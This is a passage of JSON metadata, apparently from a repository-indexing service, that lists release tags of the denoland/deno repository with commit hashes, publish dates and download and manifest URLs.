-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_par